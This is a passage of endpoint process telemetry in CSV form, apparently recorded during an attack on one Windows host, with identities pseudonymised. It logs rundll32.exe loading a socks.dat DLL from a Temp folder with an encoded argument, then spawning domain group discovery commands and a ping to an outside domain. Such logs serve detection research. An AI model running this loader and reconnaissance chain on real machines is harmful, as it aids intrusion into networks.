+1465,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:23:14.721116400+00:00,4756,PING.EXE,ping  -n 1 www.bingnewspaper.com,PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\PING.EXE,22528,2f46799d79d22ac72c241ec0322b011d,7af50fa112932ea3284f7821b2eea2b7582f558dba897231bb82182003c29f8b,9c13c854a4ef98879d0cab80ef679b4c4eccf518,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:23:14.654837100+00:00,18244,cmd.exe,"""cmd.exe"" /c ""ping -n 1 www.bingnewspaper.com""",True,2021-06-23 03:16:43.971462700+00:00,16760,rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:23:14.967244600+00:00,2021-06-23 03:24:57.734069600+00:00,5a1b14dd-c6cb-4a0e-87fb-b4ec75776e4e,computerpii_0a470890c60768167990033d701e7bd881398861,161482,False,10.7740.19041.1052,False,11540474045173110,,11540474045173112,2021-06-23 03:23:14.654837100+00:00,18244,2021-06-23 03:23:14.654837100+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,18244,128,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:23:14.692310600+00:00,2021-02-17 04:34:58.875918800+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,ping.exe,ping.exe,TCP/IP Ping Command
+1466,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:20:41.546563+00:00,664,cmd.exe,cmd.exe ,PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:16:43.971462700+00:00,16760,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",True,2021-06-23 03:16:43.772747700+00:00,6872,\Device\HarddiskVolume3\Windows\System32\dllhost.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:20:41.865740300+00:00,2021-06-23 03:22:46.510477600+00:00,8f7e5afa-e83d-474d-9779-a06a8bdcea5e,computerpii_0a470890c60768167990033d701e7bd881398861,161376,False,10.7740.19041.1052,False,11540474045173046,,11540474045173076,2021-06-23 03:16:43.971462700+00:00,16760,2021-06-23 03:16:43.971462700+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,16760,128,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-23 03:14:30.370328400+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,5.0,1.0,0.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1467,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:20:41.553600+00:00,16820,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:20:41.546563+00:00,664,cmd.exe,cmd.exe ,True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:20:41.866137800+00:00,2021-06-23 03:22:46.510517+00:00,8e0eca23-5c61-4217-a83d-819b6db767b0,computerpii_0a470890c60768167990033d701e7bd881398861,161377,False,10.7740.19041.1052,False,11540474045173076,,11540474045173077,2021-06-23 03:20:41.546563+00:00,664,2021-06-23 03:20:41.546563+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,664,128,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,0.0,1.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1468,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:21:46.267044600+00:00,15280,cmd.exe,"""cmd.exe"" /c ""net localgroup DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53 /domain""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:16:43.971462700+00:00,16760,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",True,2021-06-23 03:16:43.772747700+00:00,6872,\Device\HarddiskVolume3\Windows\System32\dllhost.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:21:47.378644500+00:00,2021-06-23 03:22:46.512682900+00:00,e806a87f-40c1-4530-b775-3f68b5a98086,computerpii_0a470890c60768167990033d701e7bd881398861,161441,False,10.7740.19041.1052,False,11540474045173046,,11540474045173088,2021-06-23 03:16:43.971462700+00:00,16760,2021-06-23 03:16:43.971462700+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,16760,18560,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-23 03:14:30.370328400+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,5.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1469,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:21:46.399059600+00:00,19588,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:21:46.267044600+00:00,15280,cmd.exe,"""cmd.exe"" /c ""net localgroup DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53 /domain""",True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:21:47.378864700+00:00,2021-06-23 03:22:46.512720+00:00,312aa77d-d2c9-4729-8383-36df6599b574,computerpii_0a470890c60768167990033d701e7bd881398861,161442,False,10.7740.19041.1052,False,11540474045173088,,11540474045173089,2021-06-23 03:21:46.267044600+00:00,15280,2021-06-23 03:21:46.267044600+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,15280,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1470,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:21:46.442651700+00:00,13216,net.exe,net  localgroup DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53 /domain,PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\net.exe,59904,0bd94a338eea5a4e1f2830ae326e6d19,9f376759bcbcd705f726460fc4a7e2b07f310f52baa73caaaaa124fddbdf993e,88b101598cc6726b7a57d02b1fa95be1b272a821,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:21:46.267044600+00:00,15280,cmd.exe,"""cmd.exe"" /c ""net localgroup DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53 /domain""",True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:21:47.379834200+00:00,2021-06-23 03:22:46.512756100+00:00,56a4108c-fd94-4e92-a0bd-792d89f07fd2,computerpii_0a470890c60768167990033d701e7bd881398861,161443,False,10.7740.19041.1052,False,11540474045173088,,11540474045173090,2021-06-23 03:21:46.267044600+00:00,15280,2021-06-23 03:21:46.267044600+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,15280,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,net.exe,net.exe,Net Command
+1471,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:21:46.453521100+00:00,17296,net1.exe,net1  localgroup DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53 /domain,PortableExecutable,2021-03-11 01:07:22.990816900+00:00,C:\Windows\System32\net1.exe,183808,ba0bccc6029fbbe6d8b41197f252742f,253e6148ec7a95ea3950e032f9def1ec7c0e0cd172cc6d770d2807a64fc4a7ca,fa29205a40d3cbc69946784946c75eb66afd9950,0bd94a338eea5a4e1f2830ae326e6d19,9f376759bcbcd705f726460fc4a7e2b07f310f52baa73caaaaa124fddbdf993e,88b101598cc6726b7a57d02b1fa95be1b272a821,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:21:46.442651700+00:00,13216,net.exe,net  localgroup DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53 /domain,True,2021-06-23 03:21:46.267044600+00:00,15280,\Device\HarddiskVolume3\Windows\System32\cmd.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:21:47.380392400+00:00,2021-06-23 03:22:46.512791600+00:00,2e99c6e1-6070-41ff-aafe-22e8195cbaac,computerpii_0a470890c60768167990033d701e7bd881398861,161444,False,10.7740.19041.1052,False,11540474045173090,,11540474045173091,2021-06-23 03:21:46.442651700+00:00,13216,2021-06-23 03:21:46.442651700+00:00,\Device\HarddiskVolume3\Windows\System32\net.exe,13216,18560,TerminateProcessStartkey,C:\Windows\System32,59904,1986-05-05 23:55:09+00:00,2019-12-07 09:09:33.990210300+00:00,2021-06-23 03:15:31.436697300+00:00,2019-12-07 09:09:33.990210300+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,net.exe,net.exe,Net Command,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,net1.exe,net1.exe,Net Command
+1472,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:21:52.576116200+00:00,12332,cmd.exe,"""cmd.exe"" /c ""net localgroup /domain""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:16:43.971462700+00:00,16760,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",True,2021-06-23 03:16:43.772747700+00:00,6872,\Device\HarddiskVolume3\Windows\System32\dllhost.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:21:53.015023600+00:00,2021-06-23 03:22:46.512865+00:00,26baf70e-a4e8-4a48-aa0d-a16e54b632aa,computerpii_0a470890c60768167990033d701e7bd881398861,161447,False,10.7740.19041.1052,False,11540474045173046,,11540474045173094,2021-06-23 03:16:43.971462700+00:00,16760,2021-06-23 03:16:43.971462700+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,16760,18560,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-23 03:14:30.370328400+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,5.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1473,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:21:52.595147900+00:00,13184,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:21:52.576116200+00:00,12332,cmd.exe,"""cmd.exe"" /c ""net localgroup /domain""",True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:21:53.016440600+00:00,2021-06-23 03:22:46.512902900+00:00,a67409af-225e-4253-8599-7d01e1e50a17,computerpii_0a470890c60768167990033d701e7bd881398861,161448,False,10.7740.19041.1052,False,11540474045173094,,11540474045173095,2021-06-23 03:21:52.576116200+00:00,12332,2021-06-23 03:21:52.576116200+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,12332,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1474,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:21:52.635470900+00:00,18864,net.exe,net  localgroup /domain,PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\net.exe,59904,0bd94a338eea5a4e1f2830ae326e6d19,9f376759bcbcd705f726460fc4a7e2b07f310f52baa73caaaaa124fddbdf993e,88b101598cc6726b7a57d02b1fa95be1b272a821,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:21:52.576116200+00:00,12332,cmd.exe,"""cmd.exe"" /c ""net localgroup /domain""",True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:21:53.022920900+00:00,2021-06-23 03:22:46.512937900+00:00,f299bfcd-dc4c-4bbf-a7a7-fbf6d2f2447d,computerpii_0a470890c60768167990033d701e7bd881398861,161449,False,10.7740.19041.1052,False,11540474045173094,,11540474045173096,2021-06-23 03:21:52.576116200+00:00,12332,2021-06-23 03:21:52.576116200+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,12332,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,net.exe,net.exe,Net Command
+1475,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:21:52.644028300+00:00,2436,net1.exe,net1  localgroup /domain,PortableExecutable,2021-03-11 01:07:22.990816900+00:00,C:\Windows\System32\net1.exe,183808,ba0bccc6029fbbe6d8b41197f252742f,253e6148ec7a95ea3950e032f9def1ec7c0e0cd172cc6d770d2807a64fc4a7ca,fa29205a40d3cbc69946784946c75eb66afd9950,0bd94a338eea5a4e1f2830ae326e6d19,9f376759bcbcd705f726460fc4a7e2b07f310f52baa73caaaaa124fddbdf993e,88b101598cc6726b7a57d02b1fa95be1b272a821,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:21:52.635470900+00:00,18864,net.exe,net  localgroup /domain,True,2021-06-23 03:21:52.576116200+00:00,12332,\Device\HarddiskVolume3\Windows\System32\cmd.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:21:53.026877800+00:00,2021-06-23 